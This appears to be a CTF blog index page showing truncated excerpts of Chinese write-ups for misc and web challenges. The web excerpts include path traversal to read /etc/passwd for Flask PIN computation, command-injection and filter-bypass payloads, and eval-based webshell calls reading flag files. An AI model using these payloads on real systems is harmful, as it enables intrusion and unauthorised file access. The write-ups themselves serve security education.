HvAng's Nests

web-flask_pin 从报错信息中得到url/file?filename=../../../../../../etc/passwd得到用户root可以利用，其他都显示nologin/sys/class/net/ens33/address 得到mac网卡地址系统id：先读取/etc/machine-id，再读取/proc/self/cgroup，并将第一个获取到的值与第二个获取到的id值进行拼接(有docker)(非docker，直接/etc/machine-id) 3.6及以下MD5？3.8及以上sha1？不清楚 import hashlibfrom itertools import chainprobably_public_bits = [ 'root'# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__ ...

misc misc-签到喵 经典的公众号签到题 发送宝宝想要flag(这个是base64解码得到的结果)到公众号即可 misc-A 宽宽 S 00 E U2FsdGVkX19d7TPOqeK+yL2btyx2gt4lp2ErgNwLzytzew9Wu7tcVvsR4tqWzGFi 772B6etLclejBUsSwv/hmg== 零宽字节隐写，vim查看隐写字符，然后找个在线网站得到上面的字符 前段是aes字符，emm也没解出来 后来在群里看见群友在聊发现秘钥是sql，好好好，原来附件给的这个sql注入是这么玩的，然后上面的密文要把空格去掉 https://stackoverflow.org.cn/aesencrypt/ base64解码，加上flag{}就是答案 misc-机密 有个流量包，没看出什么东西，直接binwalk 得到个压缩包，直接爆破，1903 misc-社会主义大法好 一开始ARCHPR识别不了这个压缩包，以为伪加密，结果binwalk分离之后也不行，估计文件格式错了，或者我电脑配置的问题，之前我就把winrar卸了，一般有概率遇到这种情况，直接掏出b ...

emmm，没时间打，赛后自己做了一部分，跟wp复现了一部分 web- 源码！启动 很简单，虽然F12和右键被禁用，连续按两次F12即可 web-webshell是啥捏 根据表情对应的字母，翻译出 if (isset($_GET['👽'])) { eval(passmhru($_GET['👽']));}; passmhru函数也类似system函数 passthru与system的区别，passthru直接将结果输出到浏览器，不需要使用echo或return来查看结果，不返回任何值，且其可以输出二进制，比如图像数据 差不多同样的用法，直接 /?👽=ls ls /cat /flag.txt web-hello，you 简单命令注入，用分号隔断命令 1;ls1;ca\t f* web-细狗2.0 空格绕过、无字母、无回显rce ?hongzh0=1;ca\t$IFS$1/* web-ez_php1 md5绕过，读文件 序列化 反序列化 <?phphighlight_file(__FILE__);err ...

Misc-签到&签退 Misc-osint 先搜酒店外景图，找到一张相似的，百度识图，河北邯郸市永年区，直接锁定永年太极广场 HECTF{河北省邯郸市永年区永年太极广场} Misc-ezpacp 导出对象->http,发现不少东西，选择的是 /POST login,追踪http流，发现一段base64编码SEVMTE9IRUNURlgyejBVbTIzUkY=,解码得到，HELLOHECTFX2z0Um23RF, 追踪到一个 导出，加密了，试一下密码X2z0Um23RF，拿到flag HECTF{euLpTT3DQWhvoHhwqmSxQdZHQFccHOlfk7WWbXlg} Web-伪装者 首先是referer，其次是UA头，再是session伪造 先利用本地的sessions.py，解出 # kalipython3 sessions.py eyJrZXkiOiJ6eGsxaW5nIiwidXNlcm5hbWUiOiJqb2tlciJ9.ZVhPvg.6WsRkbssuzOuGgnG0G5Lqdqriqc{'key': &# ...

WEB-easy_php 最后一步需要知道php的变量命名规则，还有就是变量名被解析到 [ 之后，会被替换成_,好像+也可以，然后后面的不规则命名会得以保存 WEB-EzHttp Via头字段用于指定HTTP消息所途经的代理服务器所使用的协议和主机名称，可以指向代理服务器 php $_SERVER[‘HTTP_02TAKUXX’]函数用法 #当前请求的 02TAKUXX: 头部的内容 WEB-Puppy_rce 过滤且无参RCE <?phphighlight_file(__FILE__);header('Content-Type: text/html; charset=utf-8');error_reporting(0);include(flag.php);//当前目录下有好康的😋if (isset($_GET['var']) && $_GET['var']) { $var = $_GET['var']; if (!preg_match(&quo ...

Web-where_is_the_flag 1=system("ls"); 发现flag.php index.php flag1: 1=show_source('flag.php'); 1=system("ls /"); 发现flag2 flag2: 1=system("cat /flag2"); 1=phpinfo(); 找到flag3 ISCTF{828b2469-d08d-4c48-930d-dbf5f6cbaeaa} Web-绕进你心里 <?phphighlight_file(__FILE__);error_reporting(0);require 'flag.php';$str = (String)$_POST['pan_gu'];$num = $_GET['zhurong'];$lida1 = $_GET['hongmeng'];$lida2 = $_GET['shennong']; ...